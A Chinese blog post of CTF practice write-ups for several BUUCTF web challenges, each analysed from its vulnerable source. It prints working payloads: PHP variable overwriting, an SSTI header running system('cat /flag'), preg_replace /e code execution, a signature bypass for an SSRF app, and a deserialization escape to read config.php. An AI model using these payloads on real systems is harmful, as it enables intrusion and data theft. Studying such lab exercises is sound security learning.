BUU刷题记录(2.1-2.7)
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){  
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){    】
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){ 、
    exit($is);
}

echo "the flag is: ".$flag;

第一个exit满足条件为GET方式传入的参数钟,GET方式传参flag=flag且变量名不能有flag。

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){  
        exit($handsome);
    }
}

第二个exit满足条件为同时没有设置GET和POST的flag变量。然而这会与include传入的flag变量出现命名冲突。

if(!isset($_GET['flag']) && !isset($_POST['flag'])){ 
    exit($yds);
}

第三个exit满足POST和GET两种方式中的一种传入值为flag。

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){  
    exit($is);
}

实际上如果满足了三个exit到达最后的输出,flag这个变量是已经被覆盖的。这里就要利用PHP的命名变量覆盖来进行绕过,防止污染变量作用域。

这里的解法还是有挺多种的,我用的:

GET 
is=flag&flag=flag

先用is=flag覆盖掉$is,再触发第三个exit条件。

[BJDCTF2020]The mystery of ip

一直在尝试注入PHP,没想到是SSTI……

GET /flag.php?shell=ls HTTP/1.1
Host: node3.buuoj.cn:27022
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
X-Forwarded-For: {system('cat /flag')}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node3.buuoj.cn:27022/hint.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

[BJDCTF2020]ZJCTF,不过如此

前面两个考察的是PHP两个伪协议,比较简单,然后获得next.php源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

这里对我来说是一个比较陌生的知识点

关于这个绕过,安全客有详细的文章,代码大体相同

深入研究preg_replace与代码执行

preg_replace()函数主要结构如下

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

匹配subject对象的参数pattern,将其用replacement替换。

/e 修正符使 preg_replace()replacement 参数当作 PHP 代码。

再看下题目中这段代码

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

这段代码将键名键值分别代入,如果我们传入变量.*={${phpinfo();}},代入替换,有:

return preg_replace((.*),'strtolower("\\1")',{${phpinfo();}})

匹配后成功执行phpinfo();

然而PHP对传入的$_GET非法参数变量名,会将.转化为_替代。

所以将通配符换成另一种形式的通配符即可。

\S*=${phpinfo()}

[De1CTF 2019]SSRF Me

源码

#! /usr/bin/env python
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')

app = Flask(__name__)

secert_key = os.urandom(16) # 随机生成16位随机数

class Task:
    def __init__(self, action, param, sign, ip): # task对象的__init__方法,其中根据传入的ip的md5生成沙盒
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr
            os.mkdir(self.sandbox)

    def Exec(self): # task对象的Exec方法,分别对sign以及action进行判断,分别执行scan以及read操作
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

    def checkSign(self): # 检查签名是否正确
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False

#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST']) # 路由/geneSign 返回Sign的值
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

@app.route('/De1ta',methods=['GET','POST']) # 路由/De1ta 执行函数exec
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
@app.route('/') # 源码
def index(): 
    return open("code.txt","r").read()

def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

def md5(content):
    return hashlib.md5(content).hexdigest()

def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False

if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=80)

分析代码逻辑大致如下

# 沿着路由走的话
# 路由 ('/') 获得网站源码
@app.route('/') 
def index(): 
    return open("code.txt","r").read()

# 路由 ('/geneSign') GET方式获得param,action默认为"scan",传入getSign
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

# 函数 getSign(action, param) 返回md5(secert_key + param + action)
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

# 路由 ('/De1ta')  通过cooies传入action以及sign,通过get传入param,获得ip
@app.route('/De1ta',methods=['GET','POST']) 
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
# 函数 waf(param) 如果存在gopher伪协议或file伪协议
def waf(param): 
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False
# 最后执行exec

再看看关键的检验签名函数

# 函数 getSign(action, param) 返回md5(secert_key + param + action)
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

首先我们先生成签名

/geneSign?param=flag.txtread

由于最后我们要调用的是read函数读flag.txt,但是在生成签名时的action参数为”scan”,所以我们要传入”read”,这样生成的签名就包括了”scan”以及”read”。

[ASIS 2019]Unicorn shop

初步尝试后,他会告诉你只能输入一位字符(靶场环境有一点问题)。

所以推测是第四个是flag。

这里涉及到utf-8编码的转换安全,传入一个value大于1337的字符即可。

https://www.compart.com/en/unicode/U+10123

[0CTF 2016]piapiapia

这题挺有意思的

扫描之后发现目录中有www.zip,审计源码

先看config.php,查看配置文件:

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

看到配置文件有$flag变量,接着查看class.php文件,可以看到有两个类,类mysql封装SQL的函数,类user为mysql的拓展类,其中mysql类中封装的函数有WAF。

审计其他文件,在profile.php文件中找到关键代码。

$photo = base64_encode(file_get_contents($profile['photo']));

该变量$profile的反序列化操作之后,将变量$profile[‘photo’]进行了文件读取操作,接着在HTML代码中直接echo该变量,剩下的就是研究怎么把config.php填充到这个变量了。

传入参数后,调用函数update_profile():

public function update_profile($username, $new_profile) {
    $username = parent::filter($username);
    $new_profile = parent::filter($new_profile);

    $where = "username = '$username'";
    return parent::update($this->table, 'profile', $new_profile, $where);
}

查看过滤函数,对传入的三个值进行了过滤,其中第三个传入的$nickname参数可以通过数组绕过。

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
    die('Invalid nickname');
public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

总共是存在三个正则。第一个正则检验所有非字母值,且限制了长度,这里可以通过PHP类型-数组绕过这里的检验。

绕过了之后传入了mysql的filter函数,这里的函数将所有传入的值进行了过滤,如果存在关键字,将关键字替换为”hacker”。这里的替换应该都比较熟悉了,可以使用反序列化逃逸,逃逸后长度将代替字符";}s:5:"photo";s:10:"config.php";},总共34个字符,所以传入34个where

nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

查看profile.php拿到flag。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇